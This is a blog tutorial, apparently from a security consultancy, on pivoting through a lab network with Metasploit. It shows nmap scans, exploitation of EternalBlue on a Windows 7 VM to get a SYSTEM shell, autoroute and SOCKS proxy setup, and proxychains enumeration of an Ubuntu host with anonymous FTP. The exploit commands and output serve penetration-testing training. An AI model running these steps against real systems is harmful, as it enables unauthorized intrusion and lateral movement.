Pivoting with Metasploit and proxy chains is a sophisticated technique used by penetration testers to navigate through a network by leveraging a compromised system. This post will introduce the art of pivoting using Metasploit’s autoroute and socks_proxy modules, illustrating how to extend your reach within a target environment discreetly and effectively. We’ll explore the setup and application of these tools, providing a foundation for you to conduct thorough security assessments and network explorations. Join us as we unravel the steps to pivot with precision, maintaining stealth in the layered digital landscape.

Pivoting with Metasploit


Today we will explain how to perform the technique called «Pivoting» with Metasploit Framework but first of all we will need our own lab:

  • Kali Linux, Parrot, etc.
  • Windows 7/10 with vulnerability (EternalBlue).
  • Ubuntu with vulnerability.

Once we already have our virtual machines deployed we will need to configure the networks. I recommend to connect the virtual machines between them using internal networks:

Pivoting with Metasploit

When we already have our laboratory working correctly we can start.

Pivoting with Metasploit

For this laboratory we will do a pentest simulation so let’s start with the lab.

Windows 7 – First machine

Let’s start with the first machine just running from our Kali Linux to recognize the new server into the NAT Network:

sudo nmap -sP


Starting Nmap 7.93 ( <https://nmap.org> ) at 2023-11-08 14:33 CET
Nmap scan report for
Host is up (0.00015s latency).
MAC Address: 0A:00:27:00:00:03 (Unknown)
Nmap scan report for
Host is up (0.00027s latency).
MAC Address: 08:00:27:03:0E:D8 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00059s latency).
MAC Address: 08:00:27:9F:52:C7 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.03 seconds

We can see that we have detected the IP probably it will be our objective. Let’s scan the host deeper:

sudo nmap -n -Pn -sS -sVC -p- --min-rate=2000 -v


21/tcp    open  tcpwrapped
80/tcp    open  http         Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7600 microsoft-ds (workgroup: WORKGROUP)
45621/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 08:00:27:9F:52:C7 (Oracle VirtualBox virtual NIC)
Service Info: Host: W7-PIVOTING; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-11-08T13:40:01
|_  start_date: 2023-11-08T13:33:33
|_clock-skew: mean: -19m52s, deviation: 34m37s, median: 6s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   210: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7600 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::-:professional
|   Computer name: W7-Pivoting
|   NetBIOS computer name: W7-PIVOTING\\x00
|   Workgroup: WORKGROUP\\x00
|_  System time: 2023-11-08T14:40:01+01:00
| nbstat: NetBIOS name: W7-PIVOTING, NetBIOS user: <unknown>, NetBIOS MAC: 0800279f52c7 (Oracle VirtualBox virtual NIC)
| Names:
|   W7-PIVOTING<00>      Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   W7-PIVOTING<20>      Flags: <unique><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  \\x01\\x02__MSBROWSE__\\x02<01>  Flags: <group><active>

We can see that the machine has SMB ports open so let’s enumerate SMB ports and execute all the SMB scripts for more information. Also based into the Windows version we should check if we can exploit EthernalBlue:

sudo nmap -n -Pn -p 445 --script smb-vuln-ms17-010 --min-rate=2000 -v


445/tcp open  microsoft-ds
MAC Address: 08:00:27:9F:52:C7 (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-ms17-010: 
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:
|       <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>
|       <https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>
|_      <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>

NSE: Script Post-scanning.
Initiating NSE at 15:06
Completed NSE at 15:06, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

We can see that the objective is vulnerable to EternalBlue so let’s try if we can exploit it with metasploit:

Pivoting with Metasploit

Now we can configure the exploit and run it:

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST
msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 7
target => 7
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

After exploit the vulnerability we will see that we have opened a new session on meterpreter:

Pivoting with Metasploit

If we check which user currently we are we will see that we have control over the objective:

meterpreter > getuid
Server username: NT AUTHORITY\\SYSTEM

No we already no we have complete access to the machine and we should enumerate the machine looking for more information (in our case we know that we should pivot to another machine) so let’s start enumerating the networks:

meterpreter > ipconfig

We will discover a new network (

Pivoting with Metasploit

To enumerate more the new network with metasploit and perform pivoting over the new sessions we should put the session in backgroud with the combination “Control + z”:

Now we have our session waiting for us. Let’s configure our tunnel to perform pivoting over our objective. To start we will use the autoroute module:

msf6 exploit(windows/smb/ms17_010_eternalblue) > use multi/manage/autoroute

If we check the options of the module we will see what we need to configure the parameters “SESSION” and “SUBNET”:

Let’s configure them and add the network:

msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET
msf6 post(multi/manage/autoroute) > run

[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: windows
[*] Running module against W7-PIVOTING
[*] Searching for subnets to autoroute.
[+] Route added to subnet from host's routing table.
[+] Route added to subnet from host's routing table.
[*] Post module execution completed

We can check if we added correctly the new route:

msf6 post(multi/manage/autoroute) > route

Now we are capable to reach the new network we have discovered with all the modules in Metasploit but what happen if we want to use an external tool? We will use the auxiliary module “socks_proxy” to use it after with proxychains and then we will use external tools through the tunnel we have created:

msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy

Now for the first tunnel we will change the “SRVHOST” and the version of socks:

Now we can check if the proxy is listening:

netstat -lntp

After check that the proxy is working properly we will configure our proxychains configuration file:

nano /etc/proxychains4.conf

And we will put our proxy into the “ProxyList” with the same version and port that we have configured in metasploit:

Ubuntu – Second machine

Now we can check if we can reach with proxychains the new network with NMAP doing «Pivoting». Let’s try if we can identify new hosts:

proxychains nmap -sP --min-rate=2000

We will discover one new host:

Now we can perform more enumeration over this new objective:

proxychains nmap -n -Pn -sV

We will see that the server is running these services:

21/tcp  open  ftp        vsftpd 3.0.2
22/tcp  open  ssh        OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp  open  tcpwrapped
111/tcp open  rpcbind    2-4 (RPC #100000)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let’s deep dive into each port to see if we can discover any vulnerability or default configuration. To start we will start analyzing the Port 21 vSFTPd 3.0.2:

proxychains nmap -n -Pn -sVC -p 21

While is executing our scan we can try to reach the port manually:

proxychains ftp

If we try to log in with “anonymous” user we will see that we can use it:

In the end this is the method to do if we want to perform pivoting using Metasploit and proxychains.


Video of the post in Spanish version:

🔒 Hardsoft Security offers cybersecurity consulting services, ensuring that your business is always protected against the latest threats. And if you’re looking for hosting that puts security first, Secure Hosting is your ideal solution. We help keep your website safe with the best cybersecurity practices through our specialized cybersecurity advice.

Don’t wait to be the next target. Secure your online presence with the best solutions and services on the market. Contact Hardsoft Security and Secure Hosting today!

(Cybersecurity is not a luxury, but a necessity. Protect your investment and your online reputation.)

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.